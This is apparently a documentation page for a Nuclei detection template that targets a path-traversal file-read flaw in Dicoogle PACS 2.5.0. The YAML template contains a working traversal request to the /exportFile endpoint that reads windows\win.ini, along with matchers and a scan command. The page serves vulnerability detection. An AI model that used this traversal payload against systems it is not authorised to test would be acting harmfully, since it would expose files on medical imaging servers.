Dicoogle PACS 2.5.0 - Local File Inclusion
ID: dicoogle-pacs-lfi
Severity: high
Author: 0x_akoko
Tags: edb,windows,lfi,dicoogle
Description
Section titled “Description”Dicoogle PACS 2.5.0 is vulnerable to local file inclusion. This allows an attacker to read arbitrary files that the web user has access to. Admin credentials aren’t required.
YAML Source
Section titled “YAML Source”id: dicoogle-pacs-lfi
info: name: Dicoogle PACS 2.5.0 - Local File Inclusion author: 0x_akoko severity: high description: Dicoogle PACS 2.5.0 is vulnerable to local file inclusion. This allows an attacker to read arbitrary files that the web user has access to. Admin credentials aren't required. reference: - https://www.exploit-db.com/exploits/45007 - https://cxsecurity.com/issue/WLB-2018070131 - http://www.dicoogle.com/home classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 metadata: max-request: 1 tags: edb,windows,lfi,dicoogle
http: - method: GET path: - "{{BaseURL}}/exportFile?UID=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini"
matchers: - type: word part: body words: - "bit app support" - "fonts" - "extensions" condition: and# digest: 4a0a0047304502200a922a3baeb5c0022082da36ccd550d647d1ac6e016d347283568a16eae60c190221008585ac71c881cd529a4d9692e1a46671add059c6bde235c935d43a08a3324905:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/other/dicoogle-pacs-lfi.yaml"